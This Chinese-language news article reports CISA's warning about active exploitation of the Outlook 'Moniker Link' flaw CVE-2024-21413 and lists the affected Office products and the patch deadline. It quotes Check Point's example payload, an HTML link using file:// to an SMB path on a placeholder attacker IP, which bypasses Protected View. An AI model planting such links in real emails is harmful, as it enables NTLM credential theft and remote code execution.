周四,美国网络安全与基础设施安全局(CISA)警告美国联邦机构,要保护其系统,抵御针对微软 Outlook 关键远程代码执行(RCE)漏洞正在发起的攻击。
该漏洞由 Check Point 漏洞研究员李海飞发现,编号为 CVE – 2024 – 21413。其成因是在使用存在漏洞的 Outlook 版本打开包含恶意链接的电子邮件时,输入验证不当。
攻击者之所以能获得远程代码执行能力,是因为该漏洞使他们能够绕过受保护视图(受保护视图本应通过以只读模式打开 Office 文件来阻止嵌入其中的有害内容),并以编辑模式打开恶意 Office 文件。
一年前,微软在修复 CVE – 2024 – 21413 漏洞时也曾警告,预览窗格是一个攻击途径,即便在预览恶意构造的 Office 文档时,也可能导致攻击得逞。
正如 Check Point 所解释的,这个名为 “Moniker Link” 的安全漏洞,使得威胁行为者能够绕过 Outlook 对嵌入在电子邮件中的恶意链接的内置保护机制。他们利用 file:// 协议,并在指向攻击者控制服务器的 URL 后添加感叹号来实现这一点。
感叹号紧跟在文件扩展名之后添加,同时还会加上随机文本(Check Point 在示例中使用了 “something”),如下所示:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
CVE – 2024 – 21413 影响多种 Office 产品,包括 Microsoft Office LTSC 2021、Microsoft 365 企业版应用、Microsoft Outlook 2016 以及 Microsoft Office 2019。成功利用 CVE – 2024 – 21413 漏洞发起的攻击,可能导致 NTLM 凭证被盗取,以及通过恶意构造的 Office 文档执行任意代码。
周四,CISA 将该漏洞添加到其已知被利用漏洞(KEV)目录中,并标记为正在被积极利用。根据《约束性操作指令(BOD)22 – 01》的要求,联邦机构必须在三周内,即 2 月 27 日前,保障其网络安全。
“这类漏洞是恶意网络行为者常用的攻击途径,给联邦企业带来重大风险,” 该网络安全机构警告称。
虽然 CISA 主要专注于提醒联邦机构尽快修复漏洞,但也建议私营企业优先修复这些漏洞,以抵御正在进行的攻击。